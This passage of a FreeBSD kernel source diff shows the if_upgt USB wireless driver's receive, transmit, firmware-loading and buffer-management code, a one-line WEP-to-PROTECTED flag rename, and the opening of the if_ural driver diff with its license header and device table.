upgt_lmac_header *header; struct upgt_lmac_eeprom *eeprom; uint8_t h1_type; uint16_t h2_type; int actlen, sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); UPGT_ASSERT_LOCKED(sc); if (actlen < 1) return (NULL); /* Check only at the very beginning. */ if (!(sc->sc_flags & UPGT_FLAG_FWLOADED) && (memcmp(data->buf, "OK", 2) == 0)) { sc->sc_flags |= UPGT_FLAG_FWLOADED; wakeup_one(sc); return (NULL); } if (actlen < (int)UPGT_RX_MINSZ) return (NULL); /* * Check what type of frame came in. */ header = (struct upgt_lmac_header *)(data->buf + 4); h1_type = header->header1.type; h2_type = le16toh(header->header2.type); if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_EEPROM) { eeprom = (struct upgt_lmac_eeprom *)(data->buf + 4); uint16_t eeprom_offset = le16toh(eeprom->offset); uint16_t eeprom_len = le16toh(eeprom->len); DPRINTF(sc, UPGT_DEBUG_FW, "received EEPROM block (offset=%d, len=%d)\n", eeprom_offset, eeprom_len); memcpy(sc->sc_eeprom + eeprom_offset, data->buf + sizeof(struct upgt_lmac_eeprom) + 4, eeprom_len); /* EEPROM data has arrived in time, wakeup. */ wakeup(sc); } else if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_TX_DONE) { DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: received 802.11 TX done\n", __func__); upgt_tx_done(sc, data->buf + 4); } else if (h1_type == UPGT_H1_TYPE_RX_DATA || h1_type == UPGT_H1_TYPE_RX_DATA_MGMT) { DPRINTF(sc, UPGT_DEBUG_RECV, "%s: received 802.11 RX data\n", __func__); m = upgt_rx(sc, data->buf + 4, le16toh(header->header1.len), rssi); } else if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_STATS) { DPRINTF(sc, UPGT_DEBUG_STAT, "%s: received statistic data\n", __func__); /* TODO: what could we do with the statistic data? */ } else { /* ignore unknown frame types */ DPRINTF(sc, UPGT_DEBUG_INTR, "received unknown frame type 0x%02x\n", header->header1.type); } return (m); } /* * The firmware awaits a checksum for each frame we send to it. * The algorithm used therefor is uncommon but somehow similar to CRC32. */ static uint32_t upgt_chksum_le(const uint32_t *buf, size_t size) { size_t i; uint32_t crc = 0; for (i = 0; i < size; i += sizeof(uint32_t)) { crc = htole32(crc ^ *buf++); crc = htole32((crc >> 5) ^ (crc << 3)); } return (crc); } static struct mbuf * upgt_rx(struct upgt_softc *sc, uint8_t *data, int pkglen, int *rssi) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct upgt_lmac_rx_desc *rxdesc; struct mbuf *m; /* * don't pass packets to the ieee80211 framework if the driver isn't * RUNNING. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return (NULL); /* access RX packet descriptor */ rxdesc = (struct upgt_lmac_rx_desc *)data; /* create mbuf which is suitable for strict alignment archs */ KASSERT((pkglen + ETHER_ALIGN) < MCLBYTES, ("A current mbuf storage is small (%d)", pkglen + ETHER_ALIGN)); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "could not create RX mbuf\n"); return (NULL); } m_adj(m, ETHER_ALIGN); memcpy(mtod(m, char *), rxdesc->data, pkglen); /* trim FCS */ m->m_len = m->m_pkthdr.len = pkglen - IEEE80211_CRC_LEN; m->m_pkthdr.rcvif = ifp; if (ieee80211_radiotap_active(ic)) { struct upgt_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_rate = upgt_rx_rate(sc, rxdesc->rate); tap->wr_antsignal = rxdesc->rssi; } ifp->if_ipackets++; DPRINTF(sc, UPGT_DEBUG_RX_PROC, "%s: RX done\n", __func__); *rssi = rxdesc->rssi; return (m); } static uint8_t upgt_rx_rate(struct upgt_softc *sc, const int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const uint8_t cck_upgt2rate[4] = { 2, 4, 11, 22 }; static const uint8_t ofdm_upgt2rate[12] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 72, 96, 108 }; if (ic->ic_curmode == IEEE80211_MODE_11B && !(rate < 0 || rate > 3)) return cck_upgt2rate[rate & 0xf]; if (ic->ic_curmode == IEEE80211_MODE_11G && !(rate < 0 || rate > 11)) return ofdm_upgt2rate[rate & 0xf]; return (0); } static void upgt_tx_done(struct upgt_softc *sc, uint8_t *data) { struct ifnet *ifp = sc->sc_ifp; struct upgt_lmac_tx_done_desc *desc; int i, freed = 0; UPGT_ASSERT_LOCKED(sc); desc = (struct upgt_lmac_tx_done_desc *)data; for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data_tx = &sc->sc_tx_data[i]; if (data_tx->addr == le32toh(desc->header2.reqid)) { upgt_mem_free(sc, data_tx->addr); data_tx->ni = NULL; data_tx->addr = 0; data_tx->m = NULL; DPRINTF(sc, UPGT_DEBUG_TX_PROC, "TX done: memaddr=0x%08x, status=0x%04x, rssi=%d, ", le32toh(desc->header2.reqid), le16toh(desc->status), le16toh(desc->rssi)); DPRINTF(sc, UPGT_DEBUG_TX_PROC, "seq=%d\n", le16toh(desc->seq)); freed++; } } if (freed != 0) { sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; UPGT_UNLOCK(sc); upgt_start(ifp); UPGT_LOCK(sc); } } static void upgt_mem_free(struct upgt_softc *sc, uint32_t addr) { int i; for (i = 0; i < sc->sc_memory.pages; i++) { if (sc->sc_memory.page[i].addr == addr) { sc->sc_memory.page[i].used = 0; return; } } device_printf(sc->sc_dev, "could not free memory address 0x%08x\n", addr); } static int upgt_fw_load(struct upgt_softc *sc) { const struct firmware *fw; struct upgt_data *data_cmd; struct upgt_fw_x2_header *x2; char start_fwload_cmd[] = { 0x3c, 0x0d }; int error = 0; size_t offset; int bsize; int n; uint32_t crc32; fw = firmware_get(upgt_fwname); if (fw == NULL) { device_printf(sc->sc_dev, "could not read microcode %s\n", upgt_fwname); return (EIO); } UPGT_LOCK(sc); /* send firmware start load command */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } data_cmd->buflen = sizeof(start_fwload_cmd); memcpy(data_cmd->buf, start_fwload_cmd, data_cmd->buflen); upgt_bulk_tx(sc, data_cmd); /* send X2 header */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } data_cmd->buflen = sizeof(struct upgt_fw_x2_header); x2 = (struct upgt_fw_x2_header *)data_cmd->buf; memcpy(x2->signature, UPGT_X2_SIGNATURE, UPGT_X2_SIGNATURE_SIZE); x2->startaddr = htole32(UPGT_MEMADDR_FIRMWARE_START); x2->len = htole32(fw->datasize); x2->crc = upgt_crc32_le((uint8_t *)data_cmd->buf + UPGT_X2_SIGNATURE_SIZE, sizeof(struct upgt_fw_x2_header) - UPGT_X2_SIGNATURE_SIZE - sizeof(uint32_t)); upgt_bulk_tx(sc, data_cmd); /* download firmware */ for (offset = 0; offset < fw->datasize; offset += bsize) { if (fw->datasize - offset > UPGT_FW_BLOCK_SIZE) bsize = UPGT_FW_BLOCK_SIZE; else bsize = fw->datasize - offset; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } n = upgt_fw_copy((const uint8_t *)fw->data + offset, data_cmd->buf, bsize); data_cmd->buflen = bsize; upgt_bulk_tx(sc, data_cmd); DPRINTF(sc, UPGT_DEBUG_FW, "FW offset=%d, read=%d, sent=%d\n", offset, n, bsize); bsize = n; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware downloaded\n", __func__); /* load firmware */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } crc32 = upgt_crc32_le(fw->data, fw->datasize); *((uint32_t *)(data_cmd->buf) ) = crc32; *((uint8_t *)(data_cmd->buf) + 4) = 'g'; *((uint8_t *)(data_cmd->buf) + 5) = '\r'; data_cmd->buflen = 6; upgt_bulk_tx(sc, data_cmd); /* waiting 'OK' response. */ usbd_transfer_start(sc->sc_xfer[UPGT_BULK_RX]); error = mtx_sleep(sc, &sc->sc_mtx, 0, "upgtfw", 2 * hz); if (error != 0) { device_printf(sc->sc_dev, "firmware load failed\n"); error = EIO; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware loaded\n", __func__); fail: UPGT_UNLOCK(sc); firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static uint32_t upgt_crc32_le(const void *buf, size_t size) { uint32_t crc; crc = ether_crc32_le(buf, size); /* apply final XOR value as common for CRC-32 */ crc = htole32(crc ^ 0xffffffffU); return (crc); } /* * While copying the version 2 firmware, we need to replace two characters: * * 0x7e -> 0x7d 0x5e * 0x7d -> 0x7d 0x5d */ static int upgt_fw_copy(const uint8_t *src, char *dst, int size) { int i, j; for (i = 0, j = 0; i < size && j < size; i++) { switch (src[i]) { case 0x7e: dst[j] = 0x7d; j++; dst[j] = 0x5e; j++; break; case 0x7d: dst[j] = 0x7d; j++; dst[j] = 0x5d; j++; break; default: dst[j] = src[i]; j++; break; } } return (i); } static int upgt_mem_init(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_MEMORY_MAX_PAGES; i++) { sc->sc_memory.page[i].used = 0; if (i == 0) { /* * The first memory page is always reserved for * command data. */ sc->sc_memory.page[i].addr = sc->sc_memaddr_frame_start + MCLBYTES; } else { sc->sc_memory.page[i].addr = sc->sc_memory.page[i - 1].addr + MCLBYTES; } if (sc->sc_memory.page[i].addr + MCLBYTES >= sc->sc_memaddr_frame_end) break; DPRINTF(sc, UPGT_DEBUG_FW, "memory address page %d=0x%08x\n", i, sc->sc_memory.page[i].addr); } sc->sc_memory.pages = i; DPRINTF(sc, UPGT_DEBUG_FW, "memory pages=%d\n", sc->sc_memory.pages); return (0); } static int upgt_fw_verify(struct upgt_softc *sc) { const struct firmware *fw; const struct upgt_fw_bra_option *bra_opt; const struct upgt_fw_bra_descr *descr; const uint8_t *p; const uint32_t *uc; uint32_t bra_option_type, bra_option_len; size_t offset; int bra_end = 0; int error = 0; fw = firmware_get(upgt_fwname); if (fw == NULL) { device_printf(sc->sc_dev, "could not read microcode %s\n", upgt_fwname); return EIO; } /* * Seek to beginning of Boot Record Area (BRA). */ for (offset = 0; offset < fw->datasize; offset += sizeof(*uc)) { uc = (const uint32_t *)((const uint8_t *)fw->data + offset); if (*uc == 0) break; } for (; offset < fw->datasize; offset += sizeof(*uc)) { uc = (const uint32_t *)((const uint8_t *)fw->data + offset); if (*uc != 0) break; } if (offset == fw->datasize) { device_printf(sc->sc_dev, "firmware Boot Record Area not found\n"); error = EIO; goto fail; } DPRINTF(sc, UPGT_DEBUG_FW, "firmware Boot Record Area found at offset %d\n", offset); /* * Parse Boot Record Area (BRA) options. */ while (offset < fw->datasize && bra_end == 0) { /* get current BRA option */ p = (const uint8_t *)fw->data + offset; bra_opt = (const struct upgt_fw_bra_option *)p; bra_option_type = le32toh(bra_opt->type); bra_option_len = le32toh(bra_opt->len) * sizeof(*uc); switch (bra_option_type) { case UPGT_BRA_TYPE_FW: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_FW len=%d\n", bra_option_len); if (bra_option_len != UPGT_BRA_FWTYPE_SIZE) { device_printf(sc->sc_dev, "wrong UPGT_BRA_TYPE_FW len\n"); error = EIO; goto fail; } if (memcmp(UPGT_BRA_FWTYPE_LM86, bra_opt->data, bra_option_len) == 0) { sc->sc_fw_type = UPGT_FWTYPE_LM86; break; } if (memcmp(UPGT_BRA_FWTYPE_LM87, bra_opt->data, bra_option_len) == 0) { sc->sc_fw_type = UPGT_FWTYPE_LM87; break; } device_printf(sc->sc_dev, "unsupported firmware type\n"); error = EIO; goto fail; case UPGT_BRA_TYPE_VERSION: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_VERSION len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_DEPIF: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_DEPIF len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_EXPIF: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_EXPIF len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_DESCR: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_DESCR len=%d\n", bra_option_len); descr = (const struct upgt_fw_bra_descr *)bra_opt->data; sc->sc_memaddr_frame_start = le32toh(descr->memaddr_space_start); sc->sc_memaddr_frame_end = le32toh(descr->memaddr_space_end); DPRINTF(sc, UPGT_DEBUG_FW, "memory address space start=0x%08x\n", sc->sc_memaddr_frame_start); DPRINTF(sc, UPGT_DEBUG_FW, "memory address space end=0x%08x\n", sc->sc_memaddr_frame_end); break; case UPGT_BRA_TYPE_END: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_END len=%d\n", bra_option_len); bra_end = 1; break; default: DPRINTF(sc, UPGT_DEBUG_FW, "unknown BRA option len=%d\n", bra_option_len); error = EIO; goto fail; } /* jump to next BRA option */ offset += sizeof(struct upgt_fw_bra_option) + bra_option_len; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware verified", __func__); fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static void upgt_bulk_tx(struct upgt_softc *sc, struct upgt_data *data) { UPGT_ASSERT_LOCKED(sc); STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UPGT_STAT_INC(sc, st_tx_pending); usbd_transfer_start(sc->sc_xfer[UPGT_BULK_TX]); } static int upgt_device_reset(struct upgt_softc *sc) { struct upgt_data *data; char init_cmd[] = { 0x7e, 0x7e, 0x7e, 0x7e }; UPGT_LOCK(sc); data = upgt_getbuf(sc); if (data == NULL) { UPGT_UNLOCK(sc); return (ENOBUFS); } memcpy(data->buf, init_cmd, sizeof(init_cmd)); data->buflen = sizeof(init_cmd); upgt_bulk_tx(sc, data); usb_pause_mtx(&sc->sc_mtx, 100); UPGT_UNLOCK(sc); DPRINTF(sc, UPGT_DEBUG_FW, "%s: device initialized\n", __func__); return (0); } static int upgt_alloc_tx(struct upgt_softc *sc) { int i; STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_tx_data[i]; data->buf = ((uint8_t *)sc->sc_tx_dma_buf) + (i * MCLBYTES); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UPGT_STAT_INC(sc, st_tx_inactive); } return (0); } static int upgt_alloc_rx(struct upgt_softc *sc) { int i; STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < UPGT_RX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_rx_data[i]; data->buf = ((uint8_t *)sc->sc_rx_dma_buf) + (i * MCLBYTES); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } return (0); } static int upgt_detach(device_t dev) { struct upgt_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; /* * Prevent further allocations from RX/TX/CMD * data lists and ioctls */ UPGT_LOCK(sc); sc->sc_flags |= UPGT_FLAG_DETACHED; STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); UPGT_UNLOCK(sc); upgt_stop(sc); callout_drain(&sc->sc_led_ch); callout_drain(&sc->sc_watchdog_ch); /* drain USB transfers */ for (x = 0; x != UPGT_N_XFERS; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ UPGT_LOCK(sc); upgt_free_rx(sc); upgt_free_tx(sc); UPGT_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, UPGT_N_XFERS); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void upgt_free_rx(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_RX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_rx_data[i]; data->buf = NULL; data->ni = NULL; } } static void upgt_free_tx(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_tx_data[i]; if (data->ni != NULL) ieee80211_free_node(data->ni); data->buf = NULL; data->ni = NULL; } } static void upgt_abort_xfers_locked(struct upgt_softc *sc) { int i; UPGT_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < UPGT_N_XFERS; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static void upgt_abort_xfers(struct upgt_softc *sc) { UPGT_LOCK(sc); upgt_abort_xfers_locked(sc); UPGT_UNLOCK(sc); } #define UPGT_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) static void upgt_sysctl_node(struct upgt_softc *sc) { struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child; struct sysctl_oid *tree; struct upgt_stat *stats; stats = &sc->sc_stat; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, "UPGT statistics"); child = SYSCTL_CHILDREN(tree); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_active", &stats->st_tx_active, "Active numbers in TX queue"); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_inactive", &stats->st_tx_inactive, "Inactive numbers in TX queue"); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_pending", &stats->st_tx_pending, "Pending numbers in TX queue"); } #undef UPGT_SYSCTL_STAT_ADD32 static struct upgt_data * _upgt_getbuf(struct upgt_softc *sc) { struct upgt_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); UPGT_STAT_DEC(sc, st_tx_inactive); } else bf = NULL; if (bf == NULL) DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct upgt_data * upgt_getbuf(struct upgt_softc *sc) { struct upgt_data *bf; UPGT_ASSERT_LOCKED(sc); bf = _upgt_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static struct upgt_data * upgt_gettxbuf(struct upgt_softc *sc) { struct upgt_data *bf; UPGT_ASSERT_LOCKED(sc); bf = upgt_getbuf(sc); if (bf == NULL) return (NULL); bf->addr = upgt_mem_alloc(sc); if (bf->addr == 0) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: no free prism memory!\n", __func__); STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UPGT_STAT_INC(sc, st_tx_inactive); if (!(ifp->if_drv_flags & IFF_DRV_OACTIVE)) ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (NULL); } return (bf); } static int upgt_tx_start(struct upgt_softc *sc, struct mbuf *m, struct ieee80211_node *ni, struct upgt_data *data) { struct ieee80211vap *vap = ni->ni_vap; int error = 0, len; struct ieee80211_frame *wh; struct ieee80211_key *k; struct ifnet *ifp = sc->sc_ifp; struct upgt_lmac_mem *mem; struct upgt_lmac_tx_desc *txdesc; UPGT_ASSERT_LOCKED(sc); upgt_set_led(sc, UPGT_LED_BLINK); /* * Software crypto. */ wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); error = EIO; goto done; } /* in case packet header moved, reset pointer */ wh = mtod(m, struct ieee80211_frame *); } /* Transmit the URB containing the TX data. */ memset(data->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data->buf; mem->addr = htole32(data->addr); txdesc = (struct upgt_lmac_tx_desc *)(mem + 1); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT) { /* mgmt frames */ txdesc->header1.flags = UPGT_H1_FLAGS_TX_MGMT; /* always send mgmt frames at lowest rate (DS1) */ memset(txdesc->rates, 0x10, sizeof(txdesc->rates)); } else { /* data frames */ txdesc->header1.flags = UPGT_H1_FLAGS_TX_DATA; memcpy(txdesc->rates, sc->sc_cur_rateset, sizeof(txdesc->rates)); } txdesc->header1.type = UPGT_H1_TYPE_TX_DATA; txdesc->header1.len = htole16(m->m_pkthdr.len); txdesc->header2.reqid = htole32(data->addr); txdesc->header2.type = htole16(UPGT_H2_TYPE_TX_ACK_YES); txdesc->header2.flags = htole16(UPGT_H2_FLAGS_TX_ACK_YES); txdesc->type = htole32(UPGT_TX_DESC_TYPE_DATA); txdesc->pad3[0] = UPGT_TX_DESC_PAD3_SIZE; if (ieee80211_radiotap_active_vap(vap)) { struct upgt_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = 0; /* XXX where to get from? */ ieee80211_radiotap_tx(vap, m); } /* copy frame below our TX descriptor header */ m_copydata(m, 0, m->m_pkthdr.len, data->buf + (sizeof(*mem) + sizeof(*txdesc))); /* calculate frame size */ len = sizeof(*mem) + sizeof(*txdesc) + m->m_pkthdr.len; /* we need to align the frame to a 4 byte boundary */ len = (len + 3) & ~3; /* calculate frame checksum */ mem->chksum = upgt_chksum_le((uint32_t *)txdesc, len - sizeof(*mem)); data->ni = ni; data->m = m; data->buflen = len; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: TX start data sending (%d bytes)\n", __func__, len); KASSERT(len <= MCLBYTES, ("mbuf is small for saving data")); upgt_bulk_tx(sc, data); done: /* * If we don't regulary read the device statistics, the RX queue * will stall. It's strange, but it works, so we keep reading * the statistics here. *shrug* */ if (!(ifp->if_opackets % UPGT_TX_STAT_INTERVAL)) upgt_get_stats(sc); return (error); } static void upgt_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct upgt_data *data; int8_t nf; int rssi = -1; UPGT_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = upgt_rxeof(xfer, data, &rssi); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) return; STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, MCLBYTES); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ UPGT_UNLOCK(sc); if (m != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = -95; /* XXX */ if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); m = NULL; } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) upgt_start(ifp); UPGT_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void upgt_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct upgt_data *data; UPGT_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); UPGT_STAT_DEC(sc, st_tx_active); upgt_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UPGT_STAT_INC(sc, st_tx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); UPGT_STAT_DEC(sc, st_tx_pending); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); UPGT_STAT_INC(sc, st_tx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); UPGT_UNLOCK(sc); upgt_start(ifp); UPGT_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static device_method_t upgt_methods[] = { /* Device interface */ DEVMETHOD(device_probe, upgt_match), DEVMETHOD(device_attach, upgt_attach), DEVMETHOD(device_detach, upgt_detach), DEVMETHOD_END }; static driver_t upgt_driver = { .name = "upgt", .methods = upgt_methods, .size = sizeof(struct upgt_softc) }; static devclass_t upgt_devclass; DRIVER_MODULE(if_upgt, uhub, upgt_driver, upgt_devclass, NULL, 0); MODULE_VERSION(if_upgt, 1); MODULE_DEPEND(if_upgt, usb, 1, 1, 1); MODULE_DEPEND(if_upgt, wlan, 1, 1, 1); MODULE_DEPEND(if_upgt, upgtfw_fw, 1, 1, 1); diff --git a/sys/dev/usb/wlan/if_ural.c b/sys/dev/usb/wlan/if_ural.c index 835139075ae9..cf1da4a57813 100644 --- a/sys/dev/usb/wlan/if_ural.c +++ b/sys/dev/usb/wlan/if_ural.c @@ -1,2298 +1,2298 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005, 2006 * Damien Bergamini * * Copyright (c) 2006, 2008 * Hans Petter Selasky * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2500USB chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR ural_debug #include #include #include #ifdef USB_DEBUG static int ural_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, ural, CTLFLAG_RW, 0, "USB ural"); SYSCTL_INT(_hw_usb_ural, OID_AUTO, debug, CTLFLAG_RW, &ural_debug, 0, "Debug level"); #endif #define URAL_RSSI(rssi) \ ((rssi) > (RAL_NOISE_FLOOR + RAL_RSSI_CORR) ? \ ((rssi) - (RAL_NOISE_FLOOR + RAL_RSSI_CORR)) : 0) /* various supported device vendors/products */ static const STRUCT_USB_HOST_ID ural_devs[] = { #define URAL_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } URAL_DEV(ASUS, WL167G), URAL_DEV(ASUS, RT2570), URAL_DEV(BELKIN, F5D7050), URAL_DEV(BELKIN, F5D7051), URAL_DEV(CISCOLINKSYS, HU200TS), URAL_DEV(CISCOLINKSYS, WUSB54G), URAL_DEV(CISCOLINKSYS, WUSB54GP), URAL_DEV(CONCEPTRONIC2, C54RU), URAL_DEV(DLINK, DWLG122), URAL_DEV(GIGABYTE, GN54G), URAL_DEV(GIGABYTE, GNWBKG), URAL_DEV(GUILLEMOT, HWGUSB254), URAL_DEV(MELCO, KG54), URAL_DEV(MELCO, KG54AI), URAL_DEV(MELCO, KG54YB), URAL_DEV(MELCO, NINWIFI), URAL_DEV(MSI, RT2570), URAL_DEV(MSI, RT2570_2), 